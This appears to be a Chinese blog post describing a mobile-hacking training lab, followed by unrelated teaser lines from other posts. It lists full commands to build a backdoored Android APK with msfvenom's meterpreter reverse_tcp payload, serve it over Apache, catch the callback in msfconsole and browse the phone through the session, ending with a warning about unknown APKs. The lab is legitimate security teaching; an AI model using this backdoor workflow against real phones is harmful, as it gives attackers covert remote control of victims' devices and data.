随着Mobile技术的进步,移动性已成为Internet使用的一个关键特色。
人们的生活方式越来越依赖智能手机和平板电脑。手机使用者能够存取
电子邮件、Internet和GPS导航,并储存联络人清单、密码、日历和登入
密码等资料。并在手机上进行各种交易(网路购物、银行业务及证券交易)
Hacker会利用移动装置的特性向个人发送格式错误的APK(应用程序封装档)
或URL,以诱使受害者点击甚至安装它们,进而授予攻击者访问用户登録数据
的权限,或对其设备进行全部或部分控制。
接下来我们来谈一下Hacking Mobile Platforms中的LAB
登入Parrot Security主机,并输入sudo su切换身份
输入cd切换目録
输入以下指令service postgresql start启动Postgresql DB
输入以下指令建立一个藏有後门的Android APK(网路的APK不要乱装)
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.13 R > Desktop/Backdoor.apk
将产生的Backdoor.apk复制到/root/Desktop/Backdoor.apk /var/www/html/share/目録
cp /root/Desktop/Backdoor.apk /var/www/html/share/
输入指令service apache2 start启动Apache服务
输入指令msfconsole,再执行use exploit/multi/handler
输入以下指令
set payload android/meterpreter/reverse_tcp
set LHOST 10.10.10.13
show options
输入以下指令,执行exploit在背景执行
exploit -j -z
用Android手机到http://10.10.10.13/share 去下载Backdoor.apk
在手机安装Backdoor.apk
我们在meterpreter後台可以看到手机安装Backdoor.apk有连上来
输入指令sessions -i 1,从Meterpreter shell可以看到Android手机的资讯
输入ipconfig可以看到手机连上的IP资讯
输入pwd可以看到手机的储存设备路径
看完以上LAB以後在网路上来路不明的APK请勿下载
前言 前面几天谈的都是纯文字的资料验证,像是信箱、电话等等,但很多 API server 除了文字资...
再来说说我大学到转职前的经历好了。 大学时期,大一大二时其实不算个认真的大学生,就是个标准出社会人士...
经过这三十天的每天发文 每天督促自己学习新的东西并记录下来 没想到已经坚持到最後一天了!! 虽然其实...
前言 今天要来介绍一下用於数学运算的函式,sqrt 开根号,以及 square 平方 NumPy n...
在上一篇,我们介绍了登录档的结构和物理位置,现在你意识到他的存在,那今天就是接续前一篇最後的预告,我...